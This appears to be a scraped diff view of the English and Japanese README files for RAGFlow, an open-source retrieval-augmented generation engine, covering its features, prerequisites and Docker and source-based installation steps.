- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
|
77 |
+
|
78 |
+
|
79 |
+
## 🌟 Key Features
|
80 |
+
|
81 |
+
### 🍭 **"Quality in, quality out"**
|
82 |
+
|
83 |
+
- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
|
84 |
+
- Finds "needle in a data haystack" of literally unlimited tokens.
|
85 |
+
|
86 |
+
### 🍱 **Template-based chunking**
|
87 |
+
|
88 |
+
- Intelligent and explainable.
|
89 |
+
- Plenty of template options to choose from.
|
90 |
+
|
91 |
+
### 🌱 **Grounded citations with reduced hallucinations**
|
92 |
+
|
93 |
+
- Visualization of text chunking to allow human intervention.
|
94 |
+
- Quick view of the key references and traceable citations to support grounded answers.
|
95 |
+
|
96 |
+
### 🍔 **Compatibility with heterogeneous data sources**
|
97 |
+
|
98 |
+
- Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
|
99 |
+
|
100 |
+
### 🛀 **Automated and effortless RAG workflow**
|
101 |
+
|
102 |
+
- Streamlined RAG orchestration catered to both personal and large businesses.
|
103 |
+
- Configurable LLMs as well as embedding models.
|
104 |
+
- Multiple recall paired with fused re-ranking.
|
105 |
+
- Intuitive APIs for seamless integration with business.
|
106 |
+
|
107 |
+
## 🔎 System Architecture
|
108 |
+
|
109 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
110 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
111 |
+
</div>
|
112 |
+
|
113 |
+
## 🎬 Get Started
|
114 |
+
|
115 |
+
### 📝 Prerequisites
|
116 |
+
|
117 |
+
- CPU >= 4 cores
|
118 |
+
- RAM >= 16 GB
|
119 |
+
- Disk >= 50 GB
|
120 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
121 |
+
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
122 |
+
|
123 |
+
### 🚀 Start up the server
|
124 |
+
|
125 |
+
1. Ensure `vm.max_map_count` >= 262144:
|
126 |
+
|
127 |
+
> To check the value of `vm.max_map_count`:
|
128 |
+
>
|
129 |
+
> ```bash
|
130 |
+
> $ sysctl vm.max_map_count
|
131 |
+
> ```
|
132 |
+
>
|
133 |
+
> Reset `vm.max_map_count` to a value at least 262144 if it is not.
|
134 |
+
>
|
135 |
+
> ```bash
|
136 |
+
> # In this case, we set it to 262144:
|
137 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
138 |
+
> ```
|
139 |
+
>
|
140 |
+
> This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
|
141 |
+
>
|
142 |
+
> ```bash
|
143 |
+
> vm.max_map_count=262144
|
144 |
+
> ```
|
145 |
+
|
146 |
+
2. Clone the repo:
|
147 |
+
|
148 |
+
```bash
|
149 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
150 |
+
```
|
151 |
+
|
152 |
+
3. Build the pre-built Docker images and start up the server:
|
153 |
+
|
154 |
+
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.11.0`, before running the following commands.
|
155 |
+
|
156 |
+
```bash
|
157 |
+
$ cd ragflow/docker
|
158 |
+
$ chmod +x ./entrypoint.sh
|
159 |
+
$ docker compose up -d
|
160 |
+
```
|
161 |
+
|
162 |
+
|
163 |
+
> The core image is about 9 GB in size and may take a while to load.
|
164 |
+
|
165 |
+
4. Check the server status after having the server up and running:
|
166 |
+
|
167 |
+
```bash
|
168 |
+
$ docker logs -f ragflow-server
|
169 |
+
```
|
170 |
+
|
171 |
+
_The following output confirms a successful launch of the system:_
|
172 |
+
|
173 |
+
```bash
|
174 |
+
____ ______ __
|
175 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
176 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
177 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
178 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
179 |
+
/____/
|
180 |
+
|
181 |
+
* Running on all addresses (0.0.0.0)
|
182 |
+
* Running on http://127.0.0.1:9380
|
183 |
+
* Running on http://x.x.x.x:9380
|
184 |
+
INFO:werkzeug:Press CTRL+C to quit
|
185 |
+
```
|
186 |
+
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network abnormal` error because, at that moment, your RAGFlow may not be fully initialized.
|
187 |
+
|
188 |
+
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
189 |
+
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
190 |
+
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
|
191 |
+
|
192 |
+
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
|
193 |
+
|
194 |
+
_The show is now on!_
|
195 |
+
|
196 |
+
## 🔧 Configurations
|
197 |
+
|
198 |
+
When it comes to system configurations, you will need to manage the following files:
|
199 |
+
|
200 |
+
- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
|
201 |
+
- [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
|
202 |
+
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
|
203 |
+
|
204 |
+
You must ensure that changes to the [.env](./docker/.env) file are in line with what are in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
205 |
+
|
206 |
+
> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
|
207 |
+
|
208 |
+
To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
|
209 |
+
|
210 |
+
> Updates to all system configurations require a system reboot to take effect:
|
211 |
+
>
|
212 |
+
> ```bash
|
213 |
+
> $ docker-compose up -d
|
214 |
+
> ```
|
215 |
+
|
216 |
+
## 🛠️ Build from source
|
217 |
+
|
218 |
+
To build the Docker images from source:
|
219 |
+
|
220 |
+
```bash
|
221 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
222 |
+
$ cd ragflow/
|
223 |
+
$ docker build -t infiniflow/ragflow:dev .
|
224 |
+
$ cd ragflow/docker
|
225 |
+
$ chmod +x ./entrypoint.sh
|
226 |
+
$ docker compose up -d
|
227 |
+
```
|
228 |
+
|
229 |
+
## 🛠️ Launch service from source
|
230 |
+
|
231 |
+
To launch the service from source:
|
232 |
+
|
233 |
+
1. Clone the repository:
|
234 |
+
|
235 |
+
```bash
|
236 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
237 |
+
$ cd ragflow/
|
238 |
+
```
|
239 |
+
|
240 |
+
2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
|
241 |
+
|
242 |
+
```bash
|
243 |
+
$ conda create -n ragflow python=3.11.0
|
244 |
+
$ conda activate ragflow
|
245 |
+
$ pip install -r requirements.txt
|
246 |
+
```
|
247 |
+
|
248 |
+
```bash
|
249 |
+
# If your CUDA version is higher than 12.0, run the following additional commands:
|
250 |
+
$ pip uninstall -y onnxruntime-gpu
|
251 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
252 |
+
```
|
253 |
+
|
254 |
+
3. Copy the entry script and configure environment variables:
|
255 |
+
|
256 |
+
```bash
|
257 |
+
# Get the Python path:
|
258 |
+
$ which python
|
259 |
+
# Get the ragflow project path:
|
260 |
+
$ pwd
|
261 |
+
```
|
262 |
+
|
263 |
+
```bash
|
264 |
+
$ cp docker/entrypoint.sh .
|
265 |
+
$ vi entrypoint.sh
|
266 |
+
```
|
267 |
+
|
268 |
+
```bash
|
269 |
+
# Adjust configurations according to your actual situation (the following two export commands are newly added):
|
270 |
+
# - Assign the result of `which python` to `PY`.
|
271 |
+
# - Assign the result of `pwd` to `PYTHONPATH`.
|
272 |
+
# - Comment out `LD_LIBRARY_PATH`, if it is configured.
|
273 |
+
# - Optional: Add Hugging Face mirror.
|
274 |
+
PY=${PY}
|
275 |
+
export PYTHONPATH=${PYTHONPATH}
|
276 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
277 |
+
```
|
278 |
+
|
279 |
+
4. Launch the third-party services (MinIO, Elasticsearch, Redis, and MySQL):
|
280 |
+
|
281 |
+
```bash
|
282 |
+
$ cd docker
|
283 |
+
$ docker compose -f docker-compose-base.yml up -d
|
284 |
+
```
|
285 |
+
|
286 |
+
5. Check the configuration files, ensuring that:
|
287 |
+
|
288 |
+
- The settings in **docker/.env** match those in **conf/service_conf.yaml**.
|
289 |
+
- The IP addresses and ports for related services in **service_conf.yaml** match the local machine IP and ports exposed by the container.
|
290 |
+
|
291 |
+
6. Launch the RAGFlow backend service:
|
292 |
+
|
293 |
+
```bash
|
294 |
+
$ chmod +x ./entrypoint.sh
|
295 |
+
$ bash ./entrypoint.sh
|
296 |
+
```
|
297 |
+
|
298 |
+
7. Launch the frontend service:
|
299 |
+
|
300 |
+
```bash
|
301 |
+
$ cd web
|
302 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
303 |
+
$ vim .umirc.ts
|
304 |
+
# Update proxy.target to http://127.0.0.1:9380
|
305 |
+
$ npm run dev
|
306 |
+
```
|
307 |
+
|
308 |
+
8. Deploy the frontend service:
|
309 |
+
|
310 |
+
```bash
|
311 |
+
$ cd web
|
312 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
313 |
+
$ umi build
|
314 |
+
$ mkdir -p /ragflow/web
|
315 |
+
$ cp -r dist /ragflow/web
|
316 |
+
$ apt install nginx -y
|
317 |
+
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
318 |
+
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
319 |
+
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
320 |
+
$ systemctl start nginx
|
321 |
+
```
|
322 |
+
|
323 |
+
## 📚 Documentation
|
324 |
+
|
325 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
326 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
327 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
328 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
329 |
+
|
330 |
+
## 📜 Roadmap
|
331 |
+
|
332 |
+
See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
|
333 |
+
|
334 |
+
## 🏄 Community
|
335 |
+
|
336 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
337 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
338 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
339 |
+
|
340 |
+
## 🙌 Contributing
|
341 |
+
|
342 |
+
RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](./docs/references/CONTRIBUTING.md) first.
|
README_ja.md
ADDED
@@ -0,0 +1,289 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a>
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen"
|
22 |
+
alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
23 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
24 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
25 |
+
</a>
|
26 |
+
</p>
|
27 |
+
|
28 |
+
<h4 align="center">
|
29 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
30 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
31 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
32 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
33 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
34 |
+
</h4>
|
35 |
+
|
36 |
+
## 💡 RAGFlow とは?
|
37 |
+
|
38 |
+
[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
|
39 |
+
|
40 |
+
## 🎮 Demo
|
41 |
+
|
42 |
+
デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
|
43 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
44 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
45 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
46 |
+
</div>
|
47 |
+
|
48 |
+
|
49 |
+
## 🔥 最新情報
|
50 |
+
|
51 |
+
- 2024-09-13 ナレッジベース Q&A の検索モードを追加しました。
|
52 |
+
- 2024-09-09 エージェントに医療相談テンプレートを追加しました。
|
53 |
+
- 2024-08-22 RAG を介して SQL ステートメントへのテキストをサポートします。
|
54 |
+
- 2024-08-02 [graphrag](https://github.com/microsoft/graphrag) からインスピレーションを得た GraphRAG とマインド マップをサポートします。
|
55 |
+
- 2024-07-23 音声ファイルの解析をサポートしました。
|
56 |
+
- 2024-07-08 [Graph](./agent/README.md) ベースのワークフローをサポート
|
57 |
+
- 2024-06-27 Q&A 解析メソッドで Markdown と Docx をサポートし、Docx ファイルから画像を抽出し、Markdown ファイルからテーブルを抽出します。
|
58 |
+
- 2024-05-23 より良いテキスト検索のために [RAPTOR](https://arxiv.org/html/2401.18059v1) をサポート。
|
59 |
+
|
60 |
+
|
61 |
+
## 🌟 主な特徴
|
62 |
+
|
63 |
+
### 🍭 **"Quality in, quality out"**
|
64 |
+
|
65 |
+
- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
|
66 |
+
- 無限のトークンから"干し草の山の中の針"を見つける。
|
67 |
+
|
68 |
+
### 🍱 **テンプレートベースのチャンク化**
|
69 |
+
|
70 |
+
- 知的で解釈しやすい。
|
71 |
+
- テンプレートオプションが豊富。
|
72 |
+
|
73 |
+
### 🌱 **ハルシネーションが軽減された根拠のある引用**
|
74 |
+
|
75 |
+
- 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
|
76 |
+
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
|
77 |
+
|
78 |
+
### 🍔 **多様なデータソースとの互換性**
|
79 |
+
|
80 |
+
- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
|
81 |
+
|
82 |
+
### 🛀 **自動化された楽な RAG ワークフロー**
|
83 |
+
|
84 |
+
- 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
|
85 |
+
- カスタマイズ可能な LLM とエンベッディングモデル。
|
86 |
+
- 複数の想起と融合された再ランク付け。
|
87 |
+
- 直感的な API によってビジネスとの統合がシームレスに。
|
88 |
+
|
89 |
+
## 🔎 システム構成
|
90 |
+
|
91 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
92 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
93 |
+
</div>
|
94 |
+
|
95 |
+
## 🎬 初期設定
|
96 |
+
|
97 |
+
### 📝 必要条件
|
98 |
+
|
99 |
+
- CPU >= 4 cores
|
100 |
+
- RAM >= 16 GB
|
101 |
+
- Disk >= 50 GB
|
102 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
103 |
+
> ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
|
104 |
+
|
105 |
+
### 🚀 サーバーを起動
|
106 |
+
|
107 |
+
1. `vm.max_map_count` >= 262144 であることを確認する:
|
108 |
+
|
109 |
+
> `vm.max_map_count` の値をチェックするには:
|
110 |
+
>
|
111 |
+
> ```bash
|
112 |
+
> $ sysctl vm.max_map_count
|
113 |
+
> ```
|
114 |
+
>
|
115 |
+
> `vm.max_map_count` が 262144 より大きい値でなければリセットする。
|
116 |
+
>
|
117 |
+
> ```bash
|
118 |
+
> # In this case, we set it to 262144:
|
119 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
120 |
+
> ```
|
121 |
+
>
|
122 |
+
> この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
|
123 |
+
>
|
124 |
+
> ```bash
|
125 |
+
> vm.max_map_count=262144
|
126 |
+
> ```
|
127 |
+
|
128 |
+
2. リポジトリをクローンする:
|
129 |
+
|
130 |
+
```bash
|
131 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
132 |
+
```
|
133 |
+
|
134 |
+
3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
|
135 |
+
|
136 |
+
```bash
|
137 |
+
$ cd ragflow/docker
|
138 |
+
$ chmod +x ./entrypoint.sh
|
139 |
+
$ docker compose up -d
|
140 |
+
```
|
141 |
+
|
142 |
+
> 上記のコマンドを実行すると、RAGFlowの開発版dockerイメージが自動的にダウンロードされます。 特定のバージョンのDockerイメージをダウンロードして実行したい場合は、docker/.envファイルのRAGFLOW_VERSION変数を見つけて、対応するバージョンに変更してください。 例えば、RAGFLOW_VERSION=v0.11.0として、上記のコマンドを実行してください。
|
143 |
+
|
144 |
+
> コアイメージのサイズは約 9 GB で、ロードに時間がかかる場合があります。
|
145 |
+
|
146 |
+
4. サーバーを立ち上げた後、サーバーの状態を確認する:
|
147 |
+
|
148 |
+
```bash
|
149 |
+
$ docker logs -f ragflow-server
|
150 |
+
```
|
151 |
+
|
152 |
+
_以下の出力は、システムが正常に起動したことを確認するものです:_
|
153 |
+
|
154 |
+
```bash
|
155 |
+
____ ______ __
|
156 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
157 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
158 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
159 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
160 |
+
/____/
|
161 |
+
|
162 |
+
* Running on all addresses (0.0.0.0)
|
163 |
+
* Running on http://127.0.0.1:9380
|
164 |
+
* Running on http://x.x.x.x:9380
|
165 |
+
INFO:werkzeug:Press CTRL+C to quit
|
166 |
+
```
|
167 |
+
> もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
|
168 |
+
|
169 |
+
5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
|
170 |
+
> デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`(ポート番号は省略)だけを入力すればよい。
|
171 |
+
6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
|
172 |
+
|
173 |
+
> 詳しくは [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) を参照してください。
|
174 |
+
|
175 |
+
_これで初期設定完了!ショーの開幕です!_
|
176 |
+
|
177 |
+
## 🔧 コンフィグ
|
178 |
+
|
179 |
+
システムコンフィグに関しては、以下のファイルを管理する必要がある:
|
180 |
+
|
181 |
+
- [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
|
182 |
+
- [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
|
183 |
+
- [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
|
184 |
+
|
185 |
+
[.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。
|
186 |
+
|
187 |
+
> [./docker/README](./docker/README.md) ファイルは環境設定とサービスコンフィグの詳細な説明を提供し、[./docker/README](./docker/README.md) ファイルに記載されている全ての環境設定が [service_conf.yaml](./docker/service_conf.yaml) ファイルの対応するコンフィグと一致していることを確認することが義務付けられています。
|
188 |
+
|
189 |
+
デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
|
190 |
+
|
191 |
+
> すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
|
192 |
+
>
|
193 |
+
> ```bash
|
194 |
+
> $ docker-compose up -d
|
195 |
+
> ```
|
196 |
+
|
197 |
+
## 🛠️ ソースからビルドする
|
198 |
+
|
199 |
+
ソースからDockerイメージをビルドす��には:
|
200 |
+
|
201 |
+
```bash
|
202 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
203 |
+
$ cd ragflow/
|
204 |
+
$ docker build -t infiniflow/ragflow:v0.11.0 .
|
205 |
+
$ cd ragflow/docker
|
206 |
+
$ chmod +x ./entrypoint.sh
|
207 |
+
$ docker compose up -d
|
208 |
+
```
|
209 |
+
|
210 |
+
## 🛠️ ソースコードからサービスを起動する方法
|
211 |
+
|
212 |
+
ソースコードからサービスを起動する場合は、以下の手順に従ってください:
|
213 |
+
|
214 |
+
1. リポジトリをクローンします
|
215 |
+
```bash
|
216 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
217 |
+
$ cd ragflow/
|
218 |
+
```
|
219 |
+
|
220 |
+
2. 仮想環境を作成します(AnacondaまたはMinicondaがインストールされていることを確認してください)
|
221 |
+
```bash
|
222 |
+
$ conda create -n ragflow python=3.11.0
|
223 |
+
$ conda activate ragflow
|
224 |
+
$ pip install -r requirements.txt
|
225 |
+
```
|
226 |
+
CUDAのバージョンが12.0以上の場合、以下の追加コマンドを実行してください:
|
227 |
+
```bash
|
228 |
+
$ pip uninstall -y onnxruntime-gpu
|
229 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
230 |
+
```
|
231 |
+
|
232 |
+
3. エントリースクリプトをコピーし、環境変数を設定します
|
233 |
+
```bash
|
234 |
+
$ cp docker/entrypoint.sh .
|
235 |
+
$ vi entrypoint.sh
|
236 |
+
```
|
237 |
+
以下のコマンドで Python のパスとragflowプロジェクトのパスを取得します:
|
238 |
+
```bash
|
239 |
+
$ which python
|
240 |
+
$ pwd
|
241 |
+
```
|
242 |
+
|
243 |
+
`which python` の出力を `PY` の値として、`pwd` の出力を `PYTHONPATH` の値として設定します。
|
244 |
+
|
245 |
+
`LD_LIBRARY_PATH` が既に設定されている場合は、コメントアウトできます。
|
246 |
+
|
247 |
+
```bash
|
248 |
+
# 実際の状況に応じて設定を調整してください。以下の二つの export は新たに追加された設定です
|
249 |
+
PY=${PY}
|
250 |
+
export PYTHONPATH=${PYTHONPATH}
|
251 |
+
# オプション:Hugging Face ミラーを追加
|
252 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
253 |
+
```
|
254 |
+
|
255 |
+
4. 基本サービスを起動します
|
256 |
+
```bash
|
257 |
+
$ cd docker
|
258 |
+
$ docker compose -f docker-compose-base.yml up -d
|
259 |
+
```
|
260 |
+
|
261 |
+
5. 設定ファイルを確認します
|
262 |
+
**docker/.env** 内の設定が**conf/service_conf.yaml**内の設定と一致していることを確認してください。**service_conf.yaml**内の関連サービスのIPアドレスとポートは、ローカルマシンのIPアドレスとコンテナが公開するポートに変更する必要があります。
|
263 |
+
|
264 |
+
6. サービスを起動します
|
265 |
+
```bash
|
266 |
+
$ chmod +x ./entrypoint.sh
|
267 |
+
$ bash ./entrypoint.sh
|
268 |
+
```
|
269 |
+
|
270 |
+
## 📚 ドキュメンテーション
|
271 |
+
|
272 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
273 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
274 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
275 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
276 |
+
|
277 |
+
## 📜 ロードマップ
|
278 |
+
|
279 |
+
[RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照
|
280 |
+
|
281 |
+
## 🏄 コミュニティ
|
282 |
+
|
283 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
284 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
285 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
286 |
+
|
287 |
+
## 🙌 コントリビュート
|
288 |
+
|
289 |
+
RAGFlow はオープンソースのコラボレーションによって発展してきました。この精神に基づき、私たちはコミュニティからの多様なコントリビュートを受け入れています。 参加を希望される方は、まず [コントリビューションガイド](./docs/references/CONTRIBUTING.md)をご覧ください。
|
README_ko.md
ADDED
@@ -0,0 +1,325 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
